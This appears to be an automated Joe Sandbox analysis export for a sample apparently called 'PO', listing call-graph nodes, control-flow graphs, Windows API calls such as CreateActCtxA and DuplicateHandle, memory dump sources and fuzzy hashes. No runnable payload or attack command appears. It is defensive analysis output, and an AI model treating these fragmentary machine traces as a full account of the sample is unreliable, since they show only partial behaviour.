15536->15544 15537->15532 15541 234d435 15540->15541 15542 234d46f 15541->15542 15548 234d230 15541->15548 15542->15537 15545 234d435 15544->15545 15546 234d46f 15545->15546 15547 234d230 2 API calls 15545->15547 15546->15537 15547->15546 15549 234d23b 15548->15549 15551 234dd80 15549->15551 15552 234d35c 15549->15552 15551->15551 15553 234d367 15552->15553 15554 2345d6c 2 API calls 15553->15554 15555 234ddef 15554->15555 15556 234ddfe 15555->15556 15559 234e268 15555->15559 15563 234e270 15555->15563 15556->15551 15560 234e29e 15559->15560 15561 234e36a KiUserCallbackDispatcher 15560->15561 15562 234e36f 15560->15562 15561->15562 15564 234e29e 15563->15564 15565 234e36a KiUserCallbackDispatcher 15564->15565 15566 234e36f 15564->15566 15565->15566 15567 6fb1701 15568 6fb1731 15567->15568 15569 6fb17bc 15568->15569 15572 6fb1ee8 15568->15572 15578 6fb1ed8 15568->15578 15573 6fb1f07 15572->15573 15584 6fb1fc0 15573->15584 15574 6fb1f3b 15588 6fb10f8 15574->15588 15576 6fb1f4a 15576->15569 15579 6fb1ee8 15578->15579 15583 6fb1fc0 GetCurrentThreadId 15579->15583 15580 6fb1f3b 15581 6fb10f8 GetCurrentThreadId 15580->15581 15582 6fb1f4a 15581->15582 15582->15569 15583->15580 15585 6fb201f GetCurrentThreadId 15584->15585 15587 6fb2065 15585->15587 15587->15574 15589 6fb1103 15588->15589 15590 6fb23ec GetCurrentThreadId 15589->15590 15591 6fb2417 15589->15591 15590->15591 15591->15576 15592 6fb20c0 15593 6fb210e EnumThreadWindows 15592->15593 15594 6fb2104 15592->15594 15595 6fb2140 15593->15595 15594->15593 15596 2344668 15597 234467a 15596->15597 15598 2344686 15597->15598 15602 2344778 15597->15602 15607 2343e1c 15598->15607 15600 23446a5 15603 234479d 15602->15603 15611 2344878 15603->15611 15615 2344888 15603->15615 15608 2343e27 15607->15608 15609 2345cec 2 API calls 15608->15609 15610 23472f8 15609->15610 15610->15600 15612 23448af 15611->15612 15613 234498c 15612->15613 15619 234449c 15612->15619 15616 23448af 15615->15616 15617 234498c 15616->15617 15618 234449c CreateActCtxA 15616->15618 15618->15617 15620 2345918 CreateActCtxA 15619->15620 15622 23459db 15620->15622 15623 234d788 DuplicateHandle 15624 234d81e 15623->15624
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1691310008.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6fb0000_PO.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 6ecee77476a025c0b5d226657b1fab96a458e1ae6296d17ded52591d5836dc64
                                                                                                                                            • Instruction ID: a2ed2fb37d35aa4ff15b917d56143125278fd87b9ba2dff2be119d6a5669b6fd
                                                                                                                                            • Opcode Fuzzy Hash: 6ecee77476a025c0b5d226657b1fab96a458e1ae6296d17ded52591d5836dc64
                                                                                                                                            • Instruction Fuzzy Hash: 06D11A31E00209CFEB54DFA6C858BADBBF1BF94304F15D558E405AB2A5DB70E949CB80

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 294 234d530-234d538 295 234d4f7-234d52f 294->295 296 234d53a-234d5cf GetCurrentProcess 294->296 304 234d5d1-234d5d7 296->304 305 234d5d8-234d60c GetCurrentThread 296->305 304->305 306 234d615-234d649 GetCurrentProcess 305->306 307 234d60e-234d614 305->307 308 234d652-234d66d call 234d710 306->308 309 234d64b-234d651 306->309 307->306 313 234d673-234d6a2 GetCurrentThreadId 308->313 309->308 314 234d6a4-234d6aa 313->314 315 234d6ab-234d70d 313->315 314->315
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0234D5BE
                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 0234D5FB
                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0234D638
                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0234D691
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1683244234.0000000002340000.00000040.00000800.00020000.00000000.sdmp, Offset: 02340000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2340000_PO.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                                            • String ID: 4'^q
                                                                                                                                            • API String ID: 2063062207-1614139903
                                                                                                                                            • Opcode ID: 9c6c9f7826339be6fa927088bf170e6a56006e741fb894e3359a594515d3e731
                                                                                                                                            • Instruction ID: eeaab4020bbc011bdfdf18e6b9e6ae623ea304aa301475c99ea447305acde698
                                                                                                                                            • Opcode Fuzzy Hash: 9c6c9f7826339be6fa927088bf170e6a56006e741fb894e3359a594515d3e731
                                                                                                                                            • Instruction Fuzzy Hash: 136148B09003498FEB14DFA9D548B9EBBF1EF88304F20859DE409A7360DB35A985CF65

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 322 234d540-234d5cf GetCurrentProcess 326 234d5d1-234d5d7 322->326 327 234d5d8-234d60c GetCurrentThread 322->327 326->327 328 234d615-234d649 GetCurrentProcess 327->328 329 234d60e-234d614 327->329 330 234d652-234d66d call 234d710 328->330 331 234d64b-234d651 328->331 329->328 335 234d673-234d6a2 GetCurrentThreadId 330->335 331->330 336 234d6a4-234d6aa 335->336 337 234d6ab-234d70d 335->337 336->337
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0234D5BE
                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 0234D5FB
                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0234D638
                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0234D691
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1683244234.0000000002340000.00000040.00000800.00020000.00000000.sdmp, Offset: 02340000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2340000_PO.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2063062207-0
                                                                                                                                            • Opcode ID: 98d15ccd5b652574d29233c9f9e7c2217cd6dbd2852b60f4b7c56d5798f5b438
                                                                                                                                            • Instruction ID: f66556ef5691d10cb13da4f49b5c3fd9c1da3633262c2fa3e1c9878295cfc844
                                                                                                                                            • Opcode Fuzzy Hash: 98d15ccd5b652574d29233c9f9e7c2217cd6dbd2852b60f4b7c56d5798f5b438
                                                                                                                                            • Instruction Fuzzy Hash: AB5138B09003498FEB14DFAAD548B9EBBF5EF88314F20845DE409A7390DB39A944CF65

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 409 234b298-234b2b7 410 234b2e3-234b2e7 409->410 411 234b2b9-234b2c6 call 234af38 409->411 412 234b2e9-234b2f3 410->412 413 234b2fb-234b33c 410->413 416 234b2dc 411->416 417 234b2c8 411->417 412->413 420 234b33e-234b346 413->420 421 234b349-234b357 413->421 416->410 464 234b2ce call 234b540 417->464 465 234b2ce call 234b532 417->465 420->421 423 234b359-234b35e 421->423 424 234b37b-234b37d 421->424 422 234b2d4-234b2d6 422->416 427 234b418-234b4d8 422->427 425 234b360-234b367 call 234af44 423->425 426 234b369 423->426 428 234b380-234b387 424->428 430 234b36b-234b379 425->430 426->430 459 234b4e0-234b50b GetModuleHandleW 427->459 460 234b4da-234b4dd 427->460 431 234b394-234b39b 428->431 432 234b389-234b391 428->432 430->428 434 234b39d-234b3a5 431->434 435 234b3a8-234b3b1 call 234af54 431->435 432->431 434->435 440 234b3b3-234b3bb 435->440 441 234b3be-234b3c3 435->441 440->441 443 234b3c5-234b3cc 441->443 444 234b3e1-234b3ee 441->444 443->444 445 234b3ce-234b3de call 234af64 call 234af74 443->445 450 234b3f0-234b40e 444->450 451 234b411-234b417 444->451 445->444 450->451 461 234b514-234b528 459->461 462 234b50d-234b513 459->462 460->459 462->461 464->422 465->422
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0234B4FE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1683244234.0000000002340000.00000040.00000800.00020000.00000000.sdmp, Offset: 02340000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2340000_PO.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                            • Opcode ID: 8b407f7301d26fed79e535799f3ce5f6680b15e00aafce04e7035222f3285731
                                                                                                                                            • Instruction ID: a5a05b28bbb32b84f135d583f265b4f4bb24a5a6a77551992b3caaeb16fb494d
                                                                                                                                            • Opcode Fuzzy Hash: 8b407f7301d26fed79e535799f3ce5f6680b15e00aafce04e7035222f3285731
                                                                                                                                            • Instruction Fuzzy Hash: 048125B0A00B458FD724DF2AD45475ABBF2FF88308F008A6ED48AD7A50DB75E945CB90

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 466 234590c-234598c 468 234598f-23459d9 CreateActCtxA 466->468 470 23459e2-2345a3c 468->470 471 23459db-23459e1 468->471 478 2345a3e-2345a41 470->478 479 2345a4b-2345a4f 470->479 471->470 478->479 480 2345a60 479->480 481 2345a51-2345a5d 479->481 483 2345a61 480->483 481->480 483->483
                                                                                                                                            APIs
                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 023459C9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1683244234.0000000002340000.00000040.00000800.00020000.00000000.sdmp, Offset: 02340000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2340000_PO.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Create
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                            • Opcode ID: 725c9fd76363242d3bf5983a99cc5169f55f306e79119e332d7991db7a69bf05
                                                                                                                                            • Instruction ID: 745097f8d3498c67e56063935bb073a6d1cba50fca3c7283d9c438584de8a471
                                                                                                                                            • Opcode Fuzzy Hash: 725c9fd76363242d3bf5983a99cc5169f55f306e79119e332d7991db7a69bf05
                                                                                                                                            • Instruction Fuzzy Hash: 7441DFB0C00719CBDB24DFA9C885B8DBBF5BF48314F20806AD559AB251DB71694ACF91

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 484 234449c-23459d9 CreateActCtxA 488 23459e2-2345a3c 484->488 489 23459db-23459e1 484->489 496 2345a3e-2345a41 488->496 497 2345a4b-2345a4f 488->497 489->488 496->497 498 2345a60 497->498 499 2345a51-2345a5d 497->499 501 2345a61 498->501 499->498 501->501
                                                                                                                                            APIs
                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 023459C9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1683244234.0000000002340000.00000040.00000800.00020000.00000000.sdmp, Offset: 02340000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2340000_PO.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Create
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                            • Opcode ID: 7ffe1194c66440b2d497e817bfba4a36269fafd48354a52fa1f199cd183dd6c0
                                                                                                                                            • Instruction ID: a2b0592cce1e3e0fa32cbc906707ae7e5b4b5d4d2595e2f59620297050895c7c
                                                                                                                                            • Opcode Fuzzy Hash: 7ffe1194c66440b2d497e817bfba4a36269fafd48354a52fa1f199cd183dd6c0
                                                                                                                                            • Instruction Fuzzy Hash: 7E41E3B0C0071DCBDB24DFA9C844B9EBBF5BF49304F60805AD509AB251DB71694ACF91

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 502 2345a84-2345a90 503 2345a42-2345a47 502->503 504 2345a92-2345b14 502->504 507 2345a4b-2345a4f 503->507 508 2345a60 507->508 509 2345a51-2345a5d 507->509 511 2345a61 508->511 509->508 511->511
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1683244234.0000000002340000.00000040.00000800.00020000.00000000.sdmp, Offset: 02340000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2340000_PO.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 103cb1a6962163d2bb94f5da90b6f43333ecdfdc45da68b7dfa937ca4416dfb6
                                                                                                                                            • Instruction ID: c0e7e269d2b19969443613e580e855bf407e3633f7d87bea2e7ee075af02a9bb
                                                                                                                                            • Opcode Fuzzy Hash: 103cb1a6962163d2bb94f5da90b6f43333ecdfdc45da68b7dfa937ca4416dfb6
                                                                                                                                            • Instruction Fuzzy Hash: A031CDB0C04749CFDB11DFA8C89579DBBF1EF26318F90818AD406AB291DB75A94ACF41

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 512 6fb1fc0-6fb2063 GetCurrentThreadId 516 6fb206c-6fb209b call 6fb114c 512->516 517 6fb2065-6fb206b 512->517 521 6fb20a0-6fb20ad 516->521 517->516
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 06FB2052
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1691310008.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6fb0000_PO.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CurrentThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2882836952-0
                                                                                                                                            • Opcode ID: 2e4f2c29bdcec3fca5c299064a3750d7ab0c107843f493bdb49b4354ad5473d2
                                                                                                                                            • Instruction ID: e2820a014ea6baf8e8e060a4510ec8db48567e0a4420d770e8e4d8853b3d2599
                                                                                                                                            • Opcode Fuzzy Hash: 2e4f2c29bdcec3fca5c299064a3750d7ab0c107843f493bdb49b4354ad5473d2
                                                                                                                                            • Instruction Fuzzy Hash: C43143B49003998FCB50DFAAD844ADEBBF5FB89300F14855AE419AB252C374A944CFA1

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 522 6fb20b8-6fb2102 525 6fb210e-6fb213e EnumThreadWindows 522->525 526 6fb2104-6fb210c 522->526 527 6fb2140-6fb2146 525->527 528 6fb2147-6fb2174 525->528 526->525 527->528
                                                                                                                                            APIs
                                                                                                                                            • EnumThreadWindows.USER32(?,00000000,?), ref: 06FB2131
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1691310008.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6fb0000_PO.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: EnumThreadWindows
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2941952884-0
                                                                                                                                            • Opcode ID: 7f58dae2cd82cbd1cf327401ef15e058a42a7fd5514009901ed86fa35f051379
                                                                                                                                            • Instruction ID: 68d2d993fabcf63fa7810432f60b52da08b544b2f8bfb498f36d946f4b1bf5eb
                                                                                                                                            • Opcode Fuzzy Hash: 7f58dae2cd82cbd1cf327401ef15e058a42a7fd5514009901ed86fa35f051379
                                                                                                                                            • Instruction Fuzzy Hash: D0214971D002099FDB14CF9AD844BEEFBF9EB88320F14842AD458A3250D774AA45CFA5

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 532 234d780-234d786 533 234d788-234d81c DuplicateHandle 532->533 534 234d825-234d842 533->534 535 234d81e-234d824 533->535 535->534
                                                                                                                                            APIs
                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0234D80F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1683244234.0000000002340000.00000040.00000800.00020000.00000000.sdmp, Offset: 02340000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2340000_PO.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                            • Opcode ID: cc0bbac0e477fca9e42f46d5e632ca14d20cb560c96d4028f5c545247e1e1de1
                                                                                                                                            • Instruction ID: 7fee608e7e260418a13feea6cc40a1c03c5f1e76698c68eacfd23df076b3387a
                                                                                                                                            • Opcode Fuzzy Hash: cc0bbac0e477fca9e42f46d5e632ca14d20cb560c96d4028f5c545247e1e1de1
                                                                                                                                            • Instruction Fuzzy Hash: E021E4B5D00308AFDB10CF9AD984ADEBBF8FB48324F14845AE958A3351D374A944CFA5

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 538 234d788-234d81c DuplicateHandle 539 234d825-234d842 538->539 540 234d81e-234d824 538->540 540->539
                                                                                                                                            APIs
                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0234D80F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1683244234.0000000002340000.00000040.00000800.00020000.00000000.sdmp, Offset: 02340000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2340000_PO.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                            • Opcode ID: 82430dc44a670c3bff3224c523f3f96532edc0cfcdf432ad3b719086a5c12fbf
                                                                                                                                            • Instruction ID: 6dc2014a8f8970da41b3522577fb62d138021ffdc368dffec84139ef6759613f
                                                                                                                                            • Opcode Fuzzy Hash: 82430dc44a670c3bff3224c523f3f96532edc0cfcdf432ad3b719086a5c12fbf
                                                                                                                                            • Instruction Fuzzy Hash: 6521E4B5D003089FDB10CF9AD984ADEBBF4FB48320F14845AE918A3350D374A944CFA1
                                                                                                                                            APIs
                                                                                                                                            • EnumThreadWindows.USER32(?,00000000,?), ref: 06FB2131
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1691310008.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6fb0000_PO.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: EnumThreadWindows
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2941952884-0
                                                                                                                                            • Opcode ID: ce80e47d878bab8c372689a264a290ef6a9a28023f2610db0800bdaf6fa17625
                                                                                                                                            • Instruction ID: 19b1620a1c23d2bf6857983205289e7e67643bfd1ab9553fb98342b403156631
                                                                                                                                            • Opcode Fuzzy Hash: ce80e47d878bab8c372689a264a290ef6a9a28023f2610db0800bdaf6fa17625
                                                                                                                                            • Instruction Fuzzy Hash: D52136B1D002098FDB14CF9AC844BEEFBF5EB88320F14842AD458A3250D778AA45CFA5
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0234B4FE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1683244234.0000000002340000.00000040.00000800.00020000.00000000.sdmp, Offset: 02340000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2340000_PO.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                            • Opcode ID: 5f36bf978317d62d1f3044da8c2bc6c576def2715a3690ed2d3fe12848c730e3
                                                                                                                                            • Instruction ID: fdb24ab0d11056ed4a90474ed6aa17bee806b6734c4a00909fbc447fae2731ac
                                                                                                                                            • Opcode Fuzzy Hash: 5f36bf978317d62d1f3044da8c2bc6c576def2715a3690ed2d3fe12848c730e3
                                                                                                                                            • Instruction Fuzzy Hash: 251110B5C003498FDB10CFAAC444ADEFBF5EB88328F10845AD829A7210C775A645CFA1
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1691310008.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6fb0000_PO.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Initialize
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2538663250-0
                                                                                                                                            • Opcode ID: d7030f515123fa6dac0e6dc85da712c9721981dd0185102e7f78126642ead93e
                                                                                                                                            • Instruction ID: da81cb09730398b92357fe0cfab0c2d1877dae848006332219ae566ca50076c2
                                                                                                                                            • Opcode Fuzzy Hash: d7030f515123fa6dac0e6dc85da712c9721981dd0185102e7f78126642ead93e
                                                                                                                                            • Instruction Fuzzy Hash: 6B1100B5D003488FDB10DFAAD848BDEBBF5EB89324F248459E559A3210C379A944CFA5
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1691310008.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6fb0000_PO.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Initialize
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2538663250-0
                                                                                                                                            • Opcode ID: 7ea001f16f846f228188915d906cf992b3afdc1ed6e62c91acaa094c1de1fb4a
                                                                                                                                            • Instruction ID: 8c4e9fea16d63c1ca842d8878893c8afab299de2fb183b0dd77bb327c5a3f0ad
                                                                                                                                            • Opcode Fuzzy Hash: 7ea001f16f846f228188915d906cf992b3afdc1ed6e62c91acaa094c1de1fb4a
                                                                                                                                            • Instruction Fuzzy Hash: F611E2B5C003488FDB10DF9AD449BDEBBF4EB49324F208459D559A7250C375A944CFA5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1682922831.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_c4d000_PO.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 77c0bfff4c0509c11cf85422b9b526e8b0410ac7e3f61c0a48d436a944c18d0d
                                                                                                                                            • Instruction ID: 3b58507ab48031652eb30b92559bff5ae723acd0aaefe3394dfec5af201753c0
                                                                                                                                            • Opcode Fuzzy Hash: 77c0bfff4c0509c11cf85422b9b526e8b0410ac7e3f61c0a48d436a944c18d0d
                                                                                                                                            • Instruction Fuzzy Hash: 252103B1604240DFCB05EF14D9C4B66BF65FB98320F24C969F90E0B256C336D816CBA1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1682967438.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_c5d000_PO.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: dd0b0abea5f94c60d8849c107aaf05d29924aa9a8196064d657062fbaac80ff5
                                                                                                                                            • Instruction ID: 77fb20e12673901ff73c923b225ab9901b82c29f6bbb44c7a3d70bd4da49238f
                                                                                                                                            • Opcode Fuzzy Hash: dd0b0abea5f94c60d8849c107aaf05d29924aa9a8196064d657062fbaac80ff5
                                                                                                                                            • Instruction Fuzzy Hash: 8421C179604300DFDB24DF14D9C4B16BBA5EB94315F24C569DC0A4B296C33AD88BCA65
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1682967438.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_c5d000_PO.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 9b4c1f2b62d15e89783712faf8aa4eb1bc2c64f8f2dc342f36e6a2b2470ee945
                                                                                                                                            • Instruction ID: 9142c2054d7ae75e01e475f6727a6c30e0acebd36849362c794e027b5bba6b71
                                                                                                                                            • Opcode Fuzzy Hash: 9b4c1f2b62d15e89783712faf8aa4eb1bc2c64f8f2dc342f36e6a2b2470ee945
                                                                                                                                            • Instruction Fuzzy Hash: D22195755093C08FDB12CF24D594715BF71EB46314F28C5EAD8498F2A7C33A984ACB62
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1682922831.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_c4d000_PO.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                                            • Instruction ID: e88b9d305f046a21166ee11682f872588685b07cfa9f771a61674bafd2b82528
                                                                                                                                            • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                                            • Instruction Fuzzy Hash: 4B11D376504280CFCB06DF14D5C4B56BF72FB94324F24C5ADE80A0B656C336D95ACBA2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1683244234.0000000002340000.00000040.00000800.00020000.00000000.sdmp, Offset: 02340000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2340000_PO.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 1a8a0ee4262dabd9abfc013f06863db030612e7331cc32b69790305cd7f0946a
                                                                                                                                            • Instruction ID: 41dbedeb9512f42dddda188749a3c810366827f54e3022948b85fb6de30b6182
                                                                                                                                            • Opcode Fuzzy Hash: 1a8a0ee4262dabd9abfc013f06863db030612e7331cc32b69790305cd7f0946a
                                                                                                                                            • Instruction Fuzzy Hash: 16A15D32A002198FCF19DFB5C84459EBBF2FF85304B1945AAE905AB265DF35E916CF40

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:21.9%
                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                            Signature Coverage:27.5%
                                                                                                                                            Total number of Nodes:40
                                                                                                                                            Total number of Limit Nodes:4
